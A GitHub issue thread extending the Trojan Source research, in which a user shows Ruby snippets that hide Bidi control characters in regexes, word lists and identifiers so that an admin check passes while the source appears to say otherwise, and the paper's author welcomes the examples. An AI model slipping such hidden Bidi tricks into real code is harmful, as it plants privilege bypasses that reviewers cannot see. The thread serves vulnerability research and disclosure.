Variations on Stretched String #9

security-curious · 2021-11-05T02:02:06Z

This is a follow-up to my post on #8, but I am creating a separate issue because it focuses on variations on the stretched string rather than on early return or comment-out.

You were correct that I didn't mention stretched string in #8 because I assumed it would work in Ruby as well. Stretched string doesn't really interest me that much though because as you noted in your paper:

there are other, perhaps simpler, ways that an adversary can cause a string comparison to fail without visual effect....such as the Zero Width Space
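For anyone following along, the failure case from that quote looks roughly like this in Ruby. It is only a sketch: the variable names are made up for illustration, and the Zero Width Space is written as an escape so it stays visible.

```ruby
plain   = 'admin'
stuffed = "admin\u200B" # same text with a Zero Width Space (U+200B) appended

p plain == stuffed # false: the strings differ even though they render alike
p plain.length     # 5
p stuffed.length   # 6
```

The comparison can only be made to fail this way, which is what motivates the variations below.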

What might be nice is if we could use Bidi not only to cause a conditional to fail (just like ZWSP) but also to cause the condition to pass. I don't think that is possible with a string, but we could stretch other things in the language to achieve it. Your paper really only mentions comments and strings as allowing Unicode, but depending on the grammar other tokens can contain Unicode characters.

Below are three other types of stretching that allow us to evaluate a conditional to true instead of failing the conditional. I am using Ruby because I know it well, but I am guessing some of these could be applicable to other languages. If they are of interest perhaps we can improve the examples, see how they are applicable to other languages and include them with your examples. With all of these examples the syntax highlighting somewhat gives the issue away but perhaps in a big block of other code it wouldn't be noticed.

Stretched Regex

The most obvious alternative to a stretched string literal is a stretched regular expression. I work on a real-world application where the roles are stored as a comma-separated string for historical reasons. So an admin will have:

user.roles = 'admin,manager,user'

while a regular user might have just:

user.roles = 'user'

I could conceive of a method to see if the user is an admin defined as:

def admin?
  roles =~ /admin/
end

Using that as my example scenario, consider the implementation below:

class User
  attr_accessor :roles

  def admin?
    @roles =~ /admin⁧⁦|user/ #⁩⁦/ # Restrict from ⁩⁩
  end
end

user = User.new
user.roles = 'user,manager'

if user.admin?
  puts 'admin!'
else
  puts 'regular user :('
end

The comment seems a bit odd with the extra |, / and # characters. But none of that should matter since everything after the # should be ignored. If you run the above you would expect it to output regular user :( but instead it outputs admin!.
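To see why, it can help to write the regex in logical (byte) order with the invisible characters spelled out as escapes. This is a sketch under an assumption: that the hidden characters in the `admin?` line are RLI (U+2067) and LRI (U+2066), as in the Trojan Source paper. The name `pattern` is only for illustration.

```ruby
# What Ruby parses: the regex literal ends at the first closing slash,
# and everything from the first `#` onward is a comment.
# Assumption: the invisible characters are RLI (U+2067) and LRI (U+2066).
pattern = /admin\u2067\u2066|user/

p 'user,manager' =~ pattern       # 0, so the condition is truthy
p 'admin,manager,user' =~ pattern # 14, matched via the "user" alternative
p 'admin' =~ pattern              # nil: a bare "admin" is not followed by RLI LRI
p 'manager' =~ pattern            # nil
```

Under that assumption the regex no longer matches the literal text `admin` on its own, only `user` (or `admin` followed by the two control characters).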

With more effort we might be able to reduce the extra characters in the comment. Also, in Ruby you can choose your own regex delimiters. These are all equivalent:

/admin/
%r[admin]
%r!admin!

The ability to choose your delimiter might help you pick a character that looks more believable when it appears in the comment.
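A quick way to check that the three spellings above really are the same regex (a minimal sketch; `forms` is just an illustrative name):

```ruby
forms = [/admin/, %r[admin], %r!admin!]

# Regexp#== compares the pattern source and options, not the delimiter used.
p forms.all? { |re| re == /admin/ } # true
p forms.map(&:source)               # ["admin", "admin", "admin"]
```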

Stretched List

Another thing we can stretch is a list of strings. In Ruby that can be written as:

%w[one two three four five six]

This is just syntactic sugar for:

['one', 'two', 'three', 'four', 'five', 'six']

As with regexes, we can choose our delimiter, so this is also the same:

%w!one two three four five six!
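A quick check that the three spellings produce the same array (a minimal sketch; the variable names are only for illustration):

```ruby
bracketed = %w[one two three four five six]
explicit  = ['one', 'two', 'three', 'four', 'five', 'six']
banged    = %w!one two three four five six!

p bracketed == explicit && explicit == banged # true
```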

Now we can inject into our list with Bidi:

role = 'User'
privileged = %w!Admin Manager⁧⁦ User! # ⁩⁦! # Don't include ⁩⁩
if privileged.include? role
  puts 'admin!'
else
  puts 'regular user :('
end

Here I am using that feature to choose my delimiter, picking ! to make the comment more believable. ! is not normally used as a delimiter, so I could also have just made my comment say # Don't include User] # and someone might think it was just an extra character.
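To see what the parser actually ends up with, the same line can be rebuilt with the invisible characters written as escapes and then evaluated. This is a sketch, assuming the hidden characters are RLI (U+2067), LRI (U+2066) and PDI (U+2069); `source` is an illustrative name.

```ruby
# The line in logical order. The %w literal ends at the first `!` after User,
# and everything from the first `#` onward is a comment.
source = "%w!Admin Manager\u2067\u2066 User! # \u2069\u2066! # Don't include \u2069\u2069"
privileged = eval(source)

p privileged.length              # 3
p privileged.map(&:length)       # [5, 9, 4]
p privileged.include?('User')    # true
p privileged.include?('Manager') # false: that element carries two extra characters
```

Under that assumption `User` is a real element of the list, and as a side effect `Manager` no longer matches a plain `'Manager'` string.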

Stretched Identifiers

My final variation is to stretch an identifier. In Ruby an identifier can contain Unicode characters. For example:

😡 = 'Some error message'
STDERR.puts 😡

So let's put some of our Bidi control characters in our variable name:

role⁧⁦= 'Admin' #⁩⁦ # Condition will ensure 'User' !⁩⁦ = 'User'⁩⁩
if role⁧⁦ == 'Admin'
  puts 'admin!'
else
  puts 'regular user :('
end

There might be other things you can do with this besides assignment.
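One way to convince yourself that the stretched name and plain `role` are two different variables is to build the source with explicit escapes and evaluate it. This is only a sketch: it assumes the invisible characters in the example are RLI (U+2067) and LRI (U+2066), and `stretched`, `source` and `values` are names made up for illustration.

```ruby
# Assumption: the identifier is "role" followed by RLI and LRI.
stretched = "role\u2067\u2066"

source = <<~RUBY
  #{stretched} = 'Admin'
  role = 'User'
  [#{stretched}, role]
RUBY

values = eval(source)
p values           # ["Admin", "User"]
p stretched.length # 6, although it renders like the 4-character "role"
```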


olimpa · 2021-11-05T02:19:44Z

Ok

nickboucher · 2021-11-05T17:37:40Z

@security-curious This is absolutely fantastic!

These are all great points. In the Trojan Source paper, we focused on constructs that we knew to be present across many languages, which ultimately resolved to comments and string literals. Regex literals are a clever extension of this in the languages that support them. Although this is not relevant to all major languages, it is relevant to some, such as Ruby and (I suspect) JavaScript.

The stretched identifiers description is the most interesting to me, however. I'm shocked that Ruby allows control characters in identifier names...I suspect there's all sorts of adversarial things you can do with this. I like the stretched identifier example above quite a lot, and for those following along here's a visualization of the underlying encoding in @security-curious's example:

I'm entirely open to adding a Ruby/ directory in this repo containing relevant examples. @security-curious please feel free to make a PR with any examples that you would like, ideally following the format used for examples in other languages as closely as possible.

security-curious · 2021-11-05T18:48:26Z

If identifiers are what interest you, keep in mind that I'm not just talking about variables. The same applies to modules, classes, constants, methods, etc. The below is a valid Ruby program:

module A📦
  class B🎓
    C💎 = 3.14

    def 🔴 r
      C💎 * r**2
    end
  end
end

puts A📦::B🎓.new.🔴 8

Constants must start with an uppercase letter. Hence the C before the 💎. Classes and modules in Ruby are just constants pointing to an instance of a module or class. So:

class A
end

Is the same as:

A = Class.new

This is the reason I needed to prefix the classes and modules with an uppercase letter, but the remaining characters can be any Unicode character. Methods and variables don't have that restriction. So while my example was about assigning a variable, you might be able to do other trickery with method, class, constant and module names. Really any identifier.
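A small sketch of that equivalence, using made-up names (`Plain`, `Assigned`, `K💎`) purely for illustration:

```ruby
class Plain
end

Assigned = Class.new # an anonymous class, named by the constant it is assigned to

p Plain.class    # Class
p Assigned.class # Class
p Assigned.name  # "Assigned"

# A constant whose name continues with a non-ASCII character after the
# leading uppercase letter.
K💎 = 3.14
p Object.const_defined?(:"K💎") # true
```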

I did reach out to the Ruby team regarding all this, and they felt that addressing it at the interpreter level was not the right solution. I guess there is a debate regarding "defense in depth" vs. the maintenance cost of playing whack-a-mole with odd Unicode characters. I can see both sides of the argument.
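If the check lives outside the interpreter, it could be as small as a scan of the source text. The following is a hypothetical sketch, not anything the Ruby team or the paper prescribes: `BIDI_CONTROLS` and `bidi_findings` are invented names, and the character ranges cover only the Bidi embedding, override and isolate controls.

```ruby
# Bidi embeddings/overrides (U+202A..U+202E) and isolates (U+2066..U+2069).
BIDI_CONTROLS = /[\u202A-\u202E\u2066-\u2069]/

# Returns [line_number, code_point] pairs for every Bidi control in the source.
def bidi_findings(source)
  source.each_line.with_index(1).flat_map do |line, number|
    line.scan(BIDI_CONTROLS).map { |ch| [number, format('U+%04X', ch.ord)] }
  end
end

sample = "role = 'User'\nrole\u2067\u2066 = 'Admin'\n"
p bidi_findings(sample) # [[2, "U+2067"], [2, "U+2066"]]
```

This says nothing about other invisible characters such as ZWSP, which is part of the whack-a-mole concern.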

security-curious · 2021-11-06T15:38:46Z

Going to close this as well since I just wanted to bring up the alternatives to see if they are of interest. I might later add the Ruby PR as you suggested. In it I can include all the strategies your paper covered as applicable to Ruby as well as maybe some of these variations.

security-curious mentioned this issue Nov 6, 2021

Early return and comment out in languages without closing comment token? #8

Closed

security-curious closed this as completed Nov 6, 2021

security-curious mentioned this issue Nov 11, 2021

Add Ruby As a Vulnerable Language #15

Open
